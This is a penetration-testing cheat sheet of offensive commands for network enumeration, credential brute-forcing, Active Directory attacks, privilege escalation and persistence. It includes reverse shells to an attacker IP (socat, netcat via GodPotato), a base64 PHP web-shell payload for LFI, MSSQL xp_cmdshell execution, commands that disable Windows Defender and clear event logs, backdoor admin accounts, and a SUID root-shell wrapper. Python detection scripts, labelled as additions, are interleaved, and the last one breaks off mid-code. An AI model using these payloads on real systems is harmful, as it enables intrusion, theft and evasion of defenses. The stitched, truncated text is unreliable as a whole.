Protocols
Most common services and their ports (all TCP unless stated otherwise):
| Port(s) | Service |
| --------------------- | ---------------------------- |
| 21 | FTP |
| 22 | SSH |
| 23 | Telnet |
| 25 | SMTP (mail) |
| 587 | secure SMTP |
| 53 (UDP) | DNS |
| 67 (UDP) and 68 (UDP) | DHCP |
| 69 (UDP) | TFTP |
| 80 | HTTP |
| 443 | HTTPS |
| 110 | POP3 (mail) |
| 111 | ONC RPC |
| 143 | IMAP (mail) |
| 161 (UDP) | SNMP |
| 139 and 445 | SMB |
| 1433 | MSSQL |
| 1978 | WiFi Mouse |
| 2049 | NFS |
| 3306 | MySQL |
| 3389 | Windows Remote Desktop (RDP) |
| 5900 | VNC |
| 5985 | WinRM HTTP |
| 5986 | WinRM HTTPS |
Most common #Active-Directory (AD) services and their ports:
| Port(s) | Service |
| ----------------- | ------------------------ |
| 53 | #DNS |
| 88 | #Kerberos Authentication |
| 135 | WMI RPC |
| 138, 139, and 445 | #SMB |
| 389 | #LDAP |
| 636 | #LDAPS |
| 5355 | #LLMNR |
| 8530 and 8531 | #WSUS |
Indicators of a Domain Controller: ports 53, 88, 389 (LDAP), 636 (LDAPS)
- %SYSTEMROOT%\NTDS\NTDS.dit holds the whole directory, including user password hashes
ARP Scan
arp
arp-scan -l [range]
netdiscover -r [range]
Service Scan
autorecon [targets] -v
nmap -p- -T4 -sC -sV -vv [targets]
FTP
ftp
wget -m ftp://[username]:[password]@[host] → download all files
ftp [host] OR ftp [username]@[host]
Run help for a more comprehensive list of commands.
- ls
- binary → transfer binary files
- ascii → transfer text files
- put [file] → upload
- get [file] → download
- mget * → get all files
- close
SSH
ssh #hydra #portforward
ssh -L [port on my machine I will use]:localhost:[port on server I want] user@ip
ssh [domain]\\[username]@[host] -p [port]
hydra -l [username] -P [wordlist] -s [port] ssh://[host]
SMTP
nmap #smtp #sendmail #swaks
nmap -p25 --script smtp-open-relay [host]
ismtp -h [host]:25 -e [wordlist] -l 3
smtp-user-enum -M [mode] -U [wordlist] -t [host]
- modes: VRFY, EXPN, RCPT
- example wordlist: /usr/share/metasploit-framework/data/wordlists/unix_users.txt
sendemail -s [host] -xu [username] -xp [password] -f [from] -t [to] -u [subject] -m [message] -a [attachment]
swaks --server [host] -au [username] -ap [password] -f [from] -t [to] --h-Subject [subject] --body [message] --attach @[attachment] -n
SNMP
snmp #hydra #snmpwalk
hydra -P [wordlist] -v [host] snmp
snmp-check -c [community] [ip]
snmpwalk -c [community] -v [version] [host] NET-SNMP-EXTEND-MIB::nsExtendOutputFull
snmpwalk -c [community] -v [version → 1 or 2c] [host] → entire MIB tree
snmpwalk -c [community] -v [version] [host] [identifier] → specific MIB parameter
MIB Identifiers
- System Processes: 1.3.6.1.2.1.25.1.6.0
- Running Programs: 1.3.6.1.2.1.25.4.2.1.2
- Process Paths: 1.3.6.1.2.1.25.4.2.1.4
- Storage Units: 1.3.6.1.2.1.25.2.3.1.4
- Software Names: 1.3.6.1.2.1.25.6.3.1.2
- User Accounts: 1.3.6.1.4.1.77.1.2.25
- TCP Local Ports: 1.3.6.1.2.1.6.13.1.3
SMB
nbtscan #enum4linux #cme #crackmapexec #smbmap
nbtscan -r [range]
enum4linux -v -a [host]
crackmapexec smb [host] -u [username] -p [password] --rid-brute
see SMB Relay
SMBMap
- smbmap -H [host]
  - -r → recursive
  - --depth [depth] → traverse directories to a specific depth (default 5)
  - -u [username] -p [password]
  - -x [command] → execute command
  - -s [share] → enumerate share
  - -d [domain] → enumerate domain
  - --download [file]
  - --upload [file]
OR
SMBClient #smbclient
smbclient -N -L //[host]
- smbclient //[host]/[share]
  - -L [host] → list shares
  - -I [ip]
  - -D [directory]
  - -U [domain]/[username]%[password]
  - -N → don't use a password
  - -c [command]
- download interesting files with
  - smbclient //[host]/[share] (optional: -U [username])
  - get [filename]
  - put [filename]
  - exit
OR recursively download all with
  - prompt off
  - recurse on
  - mget *
OR
SMBGet #smbget
- smbget -R smb://[host]/[disk] → download all files
Bruteforce: crackmapexec smb [host] -u [user/users/file] -p [password/passwords/file] --continue-on-success
- [-] → invalid credentials
- [+] → valid credentials
- (Pwn3d!) → user is local admin
Windows
windows #shares
Shares
- SYSVOL → AD data (GPOs, logon scripts); C:\Windows\SYSVOL on the DC
- C → C:\
- IPC → enumeration (admin scripts, event logs, etc.)
dir \\[domain or ip]\[share] /user:[username] [password]
Note: using the domain name → Kerberos auth; using the IP → NTLM auth
net use [drive letter]: \\[domain]\[share] /user:[username] [password] /persistent:yes
LDAP
ldap #ldapsearch
nmap --script=ldap* [host]
ldapdomaindump ldap://[host] -u '[domain]\[user]' -p [password] -o [dir]
ldapsearch -x -H ldap://[host] -b base namingcontexts
ldapsearch -x -H ldap://[host] -D '[domain]\[user]' -w [password] -b "DC=[subdomain],DC=[TLD]"
Kerberos
kerberos #kerbrute
kerbrute userenum --dc [DC] -d [domain] [userlist]
kerbrute passwordspray --dc [DC] -d [domain] [userlist] [password]
kerbrute bruteuser --dc [DC] -d [domain] [passlist] [user]
kerbrute bruteforce --dc [DC] -d [domain] [credslist]
- credslist contains [user]:[pass] on each line
RPC
rpcclient #rpc
rpcclient -N -U "" [host]
rpcclient -U [domain]/[user]%[password] [host]
- -N → no password
- --pw-nt-hash → the supplied password is an NT hash
SQL
sql #mysql #impacket
MySQL: mysql -h [host] -P [port] -u [username] -p'[password]'
PostgreSQL: PGPASSWORD=[password] psql -h [host] -p [port] -U [username]
MSSQL
impacket-mssqlclient [domain]/[username]:[password]@[host] -port [port] -windows-auth
Interesting Functions
use master;
EXEC sp_helprotect 'xp_cmdshell';
EXEC sp_helprotect 'xp_regread';
EXEC sp_helprotect 'xp_regwrite';
EXEC sp_helprotect 'xp_dirtree';
EXEC sp_helprotect 'xp_subdirs';
EXEC sp_helprotect 'xp_fileexist';
Command Execution
SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell';
EXEC sp_configure 'show advanced options', '1';
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell [command];
Impersonate
SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE';
SELECT name, principal_id, type_desc, is_disabled FROM sys.server_principals;
EXECUTE AS login = '[user]'; [query];
EXECUTE AS login = '[user]'; EXEC xp_cmdshell '[command]';
Over Link
SELECT srvname, srvproduct, rpcout FROM master..sysservers;
SELECT * FROM OPENQUERY("[target (srvname)]", '[query]');
SELECT * FROM OPENQUERY("[target]", 'SELECT @@SERVERNAME; exec xp_cmdshell ''[command]''');
Note: When using xp_cmdshell with OPENQUERY, prepend a dummy query before it or else it won't work.
NFS
rpcinfo -p [host]
showmount -e [host]
mount [host]:[share] /mnt/[dir]
umount /mnt/[dir]
WinRM
crackmapexec winrm [hosts] -u [username] -p [password]
evil-winrm -i [host] -u [user] -p [password]
evil-winrm -i [host] -u [user] -H [hash]
export KRB5CCNAME=[ticket].ccache
evil-winrm -i [host] -r [domain] -u [user]
RDP
xfreerdp /u:[domain]\\[username] /p:[password] /v:[host] +clipboard /drive:[Windows share name],[kali folder]
xfreerdp /u:[domain]\\[username] /pth:[hash] /v:[host] +clipboard /drive:[Windows share name],[kali folder]
rdesktop -d [domain] -u [username] -p [password] [host]
hydra -l [username] -P [wordlist] -s [port] rdp://[host]
VNC
vncviewer [host]:[port] -passwd [password file]
hydra -s [port] -P [wordlist] -t 4 [host] vnc
Web Pen Testing
Payloads: PayloadsAllTheThings
Site Recon
Subdomains
theharvester -d [domain] -b [search engine]
amass enum -passive -src -d [domain]
amass enum -active -d [domain]
cat [file with domains] | httprobe
GoBuster
gobuster dns -d [domain] -w [wordlist] -t [num threads]
gobuster dir -u [target URL] -x [file extensions] -w [wordlist]
gobuster dir -u [target URL] -x [file extensions] -w [wordlist] -U [auth username] -P [auth password] -s [invalid status codes] -t [num threads]
- -k → don't check the SSL cert
ffuf
Directories: ffuf -w [wordlist] -u http://TARGET/FUZZ
Files: ffuf -w [wordlist] -u http://TARGET/FUZZ -e .aspx,.html,.php,.txt,.pdf -recursion
Subdomains: ffuf -w [wordlist] -u http://TARGET -H "Host: FUZZ.[domain]"
POST Data: ffuf -w [wordlist] -X POST -d "[username=admin&password=FUZZ]" -u http://TARGET
From File: ffuf -request [req.txt] -request-proto http -w [wordlist]
Creds: ffuf -request [req.txt] -request-proto http -mode [pitchfork/clusterbomb] -w [usernames.txt]:[HFUZZ] -w [passwords.txt]:[WFUZZ]
"Good" (Match)
- -mc → status code
- -ms → response size
- -mw → number of words
- -ml → number of lines
- -mr → regex pattern
"Bad" (Filter)
- -fc → status code
- -fs → response size
- -fw → number of words
- -fl → number of lines
- -fr → regex pattern
BurpSuite
BurpSuite Tabs
- Target → site map and spidering
- Proxy → intercept traffic
- Intruder → bruteforce attacks (think automated Repeater)
- Repeater → send the same request multiple times with different parameters
- Sequencer → analyse the quality of randomness in session tokens
- Decoder → encode/decode text as hex, UTF, etc.
- Extender → add plugins
Intruder Attack Types
Single Payload Set
- Sniper: each payload goes to each payload position, in turn
- Battering Ram: same payload in all positions
Multiple Payload Sets
- Pitchfork: same payload position from multiple sets at a time (credential stuffing)
- Cluster Bomb: all payload combinations
Scoping Target
- right-click → Add to scope
- click the filter bar on top → under Filter by request type, check Show only in-scope items
SQLmap
- sqlmap -u [base URL] --crawl=1 (check all pages for injectability)
- sqlmap -u [website URL] --current-user (gets current user)
- sqlmap -u [website URL] --dbs (gets databases)
- sqlmap -u [website URL] --current-database (gets current database)
- sqlmap -u [website URL] --dump --threads=[number] (gets all data from the database)
- sqlmap -u [website URL] -D [database] --tables (gets tables)
- sqlmap -u [website URL] -D [database] -T [table] --columns (gets columns)
- sqlmap -u [website URL] -D [database] -T [table] -C [columns → can be multiple, separated by ,] --dump
- sqlmap -u [website URL] --os-shell (attempts to get a shell on the target)
Local File Inclusion (LFI)
Directories to try
/etc/passwd
/var/log/apache2/access.log
C:\Windows\System32\drivers\etc\hosts
PHP wrappers
php://filter/resource=[file].php → display contents of a PHP file
php://filter/convert.base64-encode/resource=[file].php
data://text/plain,<?php [code] ?> → run PHP code
data://text/plain;base64,[base64] → run base64-encoded PHP code
data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls
WordPress
wpscan --url http://host -e vp,vt --detection-mode aggressive -v --api-token [token]
get token from https://wpscan.com/profile
Git
git-dumper http://url [output dir]
git status
git log
git show [commit hash]
git reset --hard [commit hash]
Linux/Kali
I will think of a better title for this section, I swear.
socat file:`tty`,raw,echo=0 tcp-listen:[port]
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:[ip]:[port]
socat.exe exec:'cmd.exe',pipes TCP4:[ip]:[port]
Serving Files
HTTP: python3 -m http.server [port] --directory [directory]
SMB: impacket-smbserver [share] [directory] -port [port] -username [username] -password [password] -smb2support
FTP: python3 -m pyftpdlib -d [directory] -p [port] -u [username] -P [password]
- add -w for write permission
Beautify Shell
- python -c 'import pty; pty.spawn("/bin/bash")' OR script -qc /bin/bash /dev/null OR perl -e 'exec "/bin/sh";'
- ^Z (Ctrl+Z)
- stty -a
  - note the rows and columns
- stty raw -echo
- fg
- fg (yes, you have to type it twice; this is not a typo)
- export TERM=xterm
- stty rows [rows] columns [columns]
Persistence
Create New Service
edit /etc/systemd/system/[service].service
[Unit]
Description=[description]
[Service]
Type=simple
Restart=always
ExecStart=[executable]
[Install]
WantedBy=multi-user.target
systemctl daemon-reload
systemctl enable [service]
Create New Cron Job
crontab -e
[minute] [hour] [day of month] [month] [day of week] [command]
Windows
Lateral Movement
Remote Enumeration
net session \\[host]
reg query \\[host]\[key] ...
net view \\[host]
dir \\[host]\[share]
net use * \\[host]\[share] /user:[domain]\[username] [password]
tasklist /s [host] ...
Movement
psexec \\[host] -u [username] -p [password] -i cmd
winrs -u:[username] -p:[password] -r:[host] cmd
Switch Users
runas /user:[domain]\[username] cmd
- /netonly keeps the current user's access on the local machine (the supplied credentials are only used for network connections)
- /savecred gets creds from, or saves creds to, Windows Credential Manager
runascs [username] [password] cmd
- -d [domain]
- -r [host]:[port] → reverse shell
- -b → bypass UAC
Create New Process (WMI)
wmic /node:[ip] process call create [executable]
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -CimSession (New-CimSession -ComputerName "[ip]") -Arguments @{CommandLine="[executable]"}
Create New Service
sc \\[host] create [service] binPath= "[executable]" start= auto displayname= "[name]"
sc \\[host] description [service] "[description]"
sc \\[host] [start/stop/delete] [service]
Modify Existing Service
sc \\[host] qc vss → confirm the service runs as LocalSystem
sc \\[host] query vss → confirm the service is currently not running
sc \\[host] config vss binpath= "[executable]"
sc \\[host] [start/stop] vss
Create Scheduled Task
schtasks /s [host] /ru [user] /create /f /tn [name] /tr [command] /sc ONCE /sd 01/01/1970 /st 00:00
schtasks /s [host] /run /tn [name]
Persistence
User Level
Note: To find more autorun options, check out Autoruns from SysInternals. This includes startup directories and registry keys.
Startup Directories
- %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup → executed when the current user logs in
- %SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup → executed when any user logs in
Registry Run Key
Runs When Current User Logs In
upload exe file to somewhere in %USERPROFILE%\AppData\Roaming
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [name] /t REG_SZ /f /d "[path to exe]"
Runs When Any User Logs In
upload exe file to somewhere in C:\ProgramData
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v [name] /t REG_SZ /f /d "[path to exe]"
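The Run-key and startup-folder entries above share one trait a defender can key on: the executable is planted in a directory any user can write to (AppData\Roaming, ProgramData, Temp). The following is an added example, not part of the original cheat sheet: a small Python parser for the output of `reg query ...\Run` that flags entries whose executable lives in such a location. The sample output, the entry names (OneDrive, Updater, Teams) and the directory list are constructed assumptions for illustration.

```python
import re
from typing import List, NamedTuple


class RunEntry(NamedTuple):
    key: str        # registry key the value lives under
    name: str       # value name
    reg_type: str   # REG_SZ / REG_EXPAND_SZ
    data: str       # command line stored in the value


# Constructed sample of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
# output (not a real capture). reg query separates the columns with four spaces.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Updater    REG_SZ    C:\Users\alice\AppData\Roaming\svc\update.exe
    Teams    REG_EXPAND_SZ    %ProgramFiles%\Teams\Teams.exe --autostart
"""

VALUE_RE = re.compile(r"^\s{2,}(?P<name>.+?)\s{2,}(?P<type>REG_[A-Z_]+)\s{2,}(?P<data>.*)$")

# Directories any user can write to (assumed list). A Run entry pointing here deserves
# a second look. AppData\Local is deliberately omitted: several legitimate per-user
# installers (OneDrive among them) live there and would only produce noise.
USER_WRITABLE_DIRS = ("\\appdata\\roaming\\", "\\programdata\\", "\\temp\\",
                      "\\downloads\\", "\\users\\public\\")


def parse_reg_query(text: str) -> List[RunEntry]:
    """Turn reg query output into RunEntry records, tracking the current key header."""
    entries: List[RunEntry] = []
    current_key = ""
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith(" "):          # an unindented line is a key header
            current_key = line.strip()
            continue
        m = VALUE_RE.match(line)
        if m:
            entries.append(RunEntry(current_key, m["name"], m["type"], m["data"].strip()))
    return entries


def executable_path(command_line: str) -> str:
    """Extract the executable from a Run value: the quoted part, else the first token."""
    command_line = command_line.strip()
    if command_line.startswith('"'):
        end = command_line.find('"', 1)
        return command_line[1:end] if end > 0 else command_line[1:]
    return command_line.split(" ", 1)[0]


def flag_suspicious(entries: List[RunEntry]) -> List[str]:
    """Report entries whose executable sits in a user-writable directory."""
    findings = []
    for entry in entries:
        path = executable_path(entry.data).lower()
        hit = next((d for d in USER_WRITABLE_DIRS if d in path), None)
        if hit:
            findings.append(f"{entry.key}\\{entry.name} -> {path} (in user-writable dir {hit})")
    return findings


if __name__ == "__main__":
    for finding in flag_suspicious(parse_reg_query(SAMPLE_REG_QUERY)):
        print(finding)
```

Feed it the output of `reg query` for both the HKCU and HKLM Run keys; the same path test applies to shortcuts found in the two startup directories listed earlier.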
Scheduled Task
upload exe file to somewhere in %USERPROFILE%\AppData\Roaming
schtasks /create /f /tn [name] /tr [path to exe] /sc ONLOGON
schtasks /create /f /tn [name] /tr [path to exe] /sc DAILY /st [hh:mm]
- check with schtasks /query /tn [name] /fo list /v
- run manually with schtasks /run /tn [name]
System Level
Startup Service
upload file to somewhere in %SystemRoot%\System32
Note: either upload a service executable or use cmd /c start /b [executable] as your binpath
sc create [service] binPath= "[executable]" start= auto displayname= "[name]"
sc description [service] "[description]"
sc [start/stop/delete] [service]
Scheduled Task
upload exe file to somewhere in %SystemRoot%\System32
schtasks /create /f /tn [name] /ru system /tr [path to exe] /sc ONSTART
schtasks /create /f /tn [name] /ru system /tr [path to exe] /sc DAILY /st [hh:mm]
- check with schtasks /query /tn [name] /fo list /v
- run manually with schtasks /run /tn [name]
WMI Event
upload exe file to somewhere in %SystemRoot%\System32
wmic /NAMESPACE:"\\root\subscription" PATH EventFilter CREATE Name="[name]", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="[name]", ExecutablePath="[executable]",CommandLineTemplate="[executable]"
wmic /NAMESPACE:"\\root\subscription" PATH FilterToConsumerBinding CREATE Filter="EventFilter.Name=\"[name]\"", Consumer="CommandLineEventConsumer.Name=\"[name]\""
Recursive File Listing
dir /s /a \\[host]\[path] > [logfile]
forfiles /s /c "cmd /c echo @path" /p [path] > [logfile]
makecab [logfile] [compressed].zip
extract [compressed].zip [logfile]
Enable Command Prompt
reg add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f
Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
OR
netsh advfirewall set allprofiles state off
sc start TermService
User Creation
Local
net user [username] [password] /add
net localgroup Administrators [username] /add
net localgroup "Remote Management Users" [username] /add
net localgroup "Remote Desktop Users" [username] /add
Domain
net user [username] [password] /add /domain
net group "Domain Admins" [username] /add /domain
Insecure Guest Authentication
Enable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" /v AllowInsecureGuestAuth /t REG_DWORD /d 1 /f
shutdown /r /f /t 0
Disable
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" /v AllowInsecureGuestAuth /f
shutdown /r /f /t 0
Privilege Escalation
https://gitlab.com/exploit-database/exploitdb-bin-sploits
Windows
Checklist
https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation
1. access tokens
2. Administrators group → fodhelper UAC bypass
3. PowerShell history
4. service permissions
5. DLL hijacking
6. recent folders/files
7. interesting folders/files: C:\, C:\Users
8. passwords in registry
9. stored WiFi passwords
10. kernel version
Check AppLocker/Antivirus
(Get-ApplockerPolicy -Effective).RuleCollections
Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct -ErrorAction Stop
Get-MpComputerStatus
sc query windefend
Disable Windows Defender
sc config WinDefend start= disabled
Set-MpPreference -DisableRealtimeMonitoring $true
"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Clear Event Log
Clear-EventLog -LogName Application, Security
Access Tokens
SeImpersonatePrivilege → Potato attacks
SweetPotato.exe -p nc.exe -a "-nv [ip] [port] -e cmd" &
GodPotato.exe -cmd "nc -nv [ip] [port] -e cmd" &
GodPotato.exe -cmd "net user [username] [password] /add"
GodPotato.exe -cmd "net localgroup Administrators [username] /add"
runascs [username] [password] cmd -b -r [attacker ip]:[port]
SeRestorePrivilege → SeRestoreAbuse
PowerShell History
Get-History
(Get-PSReadlineOption).HistorySavePath
- type [path]
Service Permissions
Recommended: use a script like PrivescCheck.ps1
sc qc [service]
sc sdshow [service] → list service permissions
icacls [path] → list folder/file permissions (e.g. unquoted service path)
sc config [service] binpath= "[executable]" → reconfigure service
- [executable] can either be a service executable or cmd /c start /b [executable]
sc [start/stop] [service]
DLL Hijacking
msfvenom [options] -f dll -o [file].dll
Recent Folders/Files
dir %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent
Interesting Folders/Files
Get-ChildItem -Path C:\Users -Include .txt,.ini,.pdf,.kdbx,*.exe -Recurse -ErrorAction SilentlyContinue
Passwords in Registry
reg query HKLM /f password /t REG_SZ /s
Stored WiFi Passwords
netsh wlan show profiles
netsh wlan export profile folder=. key=clear
Kernel Exploits
https://github.com/SecWiki/windows-kernel-exploits
Guides
- HackTricks
- Absoloom's Guide
Scripts
Executables
- winPEAS
- Seatbelt (compile)
- SharpUp (compile)
- Watson (compile)
PowerShell
- PrivescCheck
  - Invoke-PrivescCheck -Extended
  - Invoke-PrivescCheck -Extended -Report "PrivescCheck_$($env:COMPUTERNAME)" -Format TXT,CSV,HTML,XML
- PowerUp (deprecated)
  - Invoke-AllChecks
- Jaws
- Sherlock (deprecated)
Other
- windows-exploit-suggester → get kernel exploits from systeminfo output
  - wes --update
  - wes systeminfo.txt -c -e -i "Elevation"
- Meterpreter run post/multi/recon/local_exploit_suggester
- Meterpreter getsystem
Linux
Checklist
https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
1. SUID
2. sudo
3. processes running as root
4. internal services → port redirection
5. cron jobs
6. interesting folders/files: /, /opt, /home
7. kernel version
*check GTFObins
SUID
find / -perm -u=s -user root 2>/dev/null
find / -perm -g=s -group root 2>/dev/null
getcap -r / 2>/dev/null
Sudo
sudo -l
Processes
ps fauxww
ps -ewwo pid,user,cmd --forest
Services
netstat/ss -antup
netstat/ss -plunt
Cron Jobs
cat /etc/crontab
ls /var/spool/cron
ls /etc/cron.*
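The crontab line format given under Persistence (five schedule fields, an optional user column in /etc/crontab and /etc/cron.d, then the command) and the cron checks in this checklist both come down to the same parsing job. The following is an added example, not part of the original cheat sheet: a Python parser for crontab text that validates the schedule fields and reports root-run jobs whose command references a world-writable directory, which is the shape a planted job usually takes. The sample /etc/crontab contents and the directory list are constructed assumptions.

```python
import re
from typing import List, NamedTuple


class CronEntry(NamedTuple):
    schedule: str   # the five fields joined, or an @special
    user: str       # user the job runs as
    command: str    # command line
    source: str     # the raw line, for reporting


# Constructed sample of an /etc/crontab (system crontab: a user column sits
# between the schedule and the command). Not a real capture.
SAMPLE_ETC_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    /tmp/.cache/update.sh
0 3     * * 1   backup  /usr/local/bin/backup.sh
@reboot         root    /dev/shm/.x
"""

FIELD_RANGES = [(0, 59), (0, 23), (1, 31), (1, 12), (0, 7)]   # minute, hour, dom, month, dow
SPECIALS = {"@reboot", "@yearly", "@annually", "@monthly", "@weekly", "@daily", "@midnight", "@hourly"}
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")          # assumed list of risky locations


def field_ok(field: str, lo: int, hi: int) -> bool:
    """Validate one schedule field: '*', n, a-b, comma lists and /step suffixes.
    Month and weekday names (jan, mon, ...) are accepted without range checking."""
    for part in field.split(","):
        base, _, step = part.partition("/")
        if step and not step.isdigit():
            return False
        if base == "*":
            continue
        a, _, b = base.partition("-")
        if a.isalpha() and (not b or b.isalpha()):
            continue
        if not a.isdigit() or (b and not b.isdigit()):
            return False
        if not (lo <= int(a) <= hi) or (b and not (lo <= int(b) <= hi)):
            return False
    return True


def parse_crontab(text: str, system: bool, owner: str = "root") -> List[CronEntry]:
    """Parse crontab text. system=True means /etc/crontab or /etc/cron.d style (user
    column present); otherwise every entry runs as `owner`, the crontab's user."""
    entries: List[CronEntry] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue                      # blank line, comment or VAR=value assignment
        tokens = line.split()
        if tokens[0] in SPECIALS:
            schedule, rest = tokens[0], tokens[1:]
        elif len(tokens) >= 6 and all(field_ok(f, lo, hi) for f, (lo, hi) in zip(tokens, FIELD_RANGES)):
            schedule, rest = " ".join(tokens[:5]), tokens[5:]
        else:
            continue                      # malformed schedule; cron would reject it as well
        if system:
            if not rest:
                continue
            user, command = rest[0], " ".join(rest[1:])
        else:
            user, command = owner, " ".join(rest)
        if command:
            entries.append(CronEntry(schedule, user, command, raw))
    return entries


def suspicious(entries: List[CronEntry]) -> List[str]:
    """Root-run jobs whose command references a world-writable directory."""
    out = []
    for e in entries:
        hit = next((d for d in WORLD_WRITABLE if d in e.command), None)
        if e.user == "root" and hit:
            out.append(f"{e.schedule} [{e.user}] {e.command} (references {hit})")
    return out


if __name__ == "__main__":
    for line in suspicious(parse_crontab(SAMPLE_ETC_CRONTAB, system=True)):
        print(line)
```

Run it over /etc/crontab and each file in /etc/cron.d with system=True, and over each file in /var/spool/cron with system=False and the file's name as the owner. The writable-directory test is a heuristic; a job in /opt or /home owned by an unprivileged user but run by root is just as interesting, and the parsed entries make that check a one-liner.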
Guides
- HackTricks
- g0tmi1k Blog
Scripts
- linPEAS
- LinEnum
- linuxprivchecker
- Meterpreter run post/multi/recon/local_exploit_suggester
#include <stdlib.h>
#include <unistd.h>

/* SUID shell wrapper: compile, then set the SUID bit on the binary (as with the bash copy below) */
int main(void) {
    setuid(0);   /* become root: only works when the binary is SUID root */
    setgid(0);
    system("/bin/bash");
    return 0;
}
cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p
Active Directory (AD)
https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg
Sync clock: timedatectl set-ntp 0 && ntpdate -u [domain]
LLMNR/NBT-NS Poisoning
- responder -I [interface] -dwP (optional -v)
  - remember you can get the interface with ip a
- hashcat -m 5600 [file containing obtained hash] [wordlist]
SMB Relay
Requirements: SMB signing disabled and relayed credentials are admin on the target machine
Note: You can't relay back to the same machine.
- discover hosts with SMB signing disabled:
  - a Nessus scan will tell you
OR
  - nmap --script smb2-security-mode -p 445 [network]
    - check for enabled and not required
OR
  - crackmapexec smb [network]
    - check for signing:False
  - add hosts to a targets file (one per line)
OR
  - crackmapexec smb [network] --gen-relay-list [targets file]
- edit /etc/responder/Responder.conf
  - change SMB = and HTTP = from On to Off
- responder -I [interface] -dwP (optional -v)
AND
- impacket-ntlmrelayx -tf [targets file] -smb2support
  - -i → interactive SMB shell
    - wait for a connection → note the "started interactive" port
    - nc -nv 127.0.0.1 [port]
  - -e [malicious].exe → execute file
    - can be an msfvenom payload, for example
  - -c "[command]" → execute command
  - -l [directory] → store loot in directory (see IPv6 attacks) → useful if credentials are non-admin
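The requirement above (signing not enforced on the target) is also the remediation lever: hosts that nmap or crackmapexec report as not requiring signing are the ones to fix with the policy "Microsoft network server: Digitally sign communications (always)". The following is an added example, not part of the original cheat sheet: a Python parser that reads nmap normal output for the smb2-security-mode script and crackmapexec's per-host banner line, and produces the list of hosts where signing is not required. Both sample outputs are constructed; the host names and addresses are placeholders. nmap's actual wording is "Message signing enabled but not required" (the page's "enabled and not required" refers to the same state).

```python
import re
from typing import Dict, List

# Constructed sample of `nmap --script smb2-security-mode -p 445` normal output for
# three hosts (not a real scan). The script prints one of:
#   "Message signing enabled and required" / "Message signing enabled but not required" /
#   "Message signing disabled!"
SAMPLE_NMAP = """\
Nmap scan report for 10.0.0.5
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for dc01.corp.local (10.0.0.1)
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Nmap scan report for 10.0.0.9
Host is up (0.0009s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2:1:0:
|_    Message signing disabled!
"""

# Constructed sample of crackmapexec's one-line-per-host banner (not a real capture).
# signing:True means the server requires signing.
SAMPLE_CME = """\
SMB         10.0.0.5        445    WS01             [*] Windows 10.0 Build 19041 x64 (name:WS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.0.0.1        445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
"""

REPORT_RE = re.compile(r"^Nmap scan report for (?:(?P<name>\S+) \((?P<ip>[\d.]+)\)|(?P<bare>\S+))$")
SIGNING_RE = re.compile(r"^\|_?\s+Message signing (?P<state>.+)$")
CME_RE = re.compile(r"^SMB\s+(?P<ip>[\d.]+)\s+445\s+\S+.*\(signing:(?P<signing>True|False)\)")


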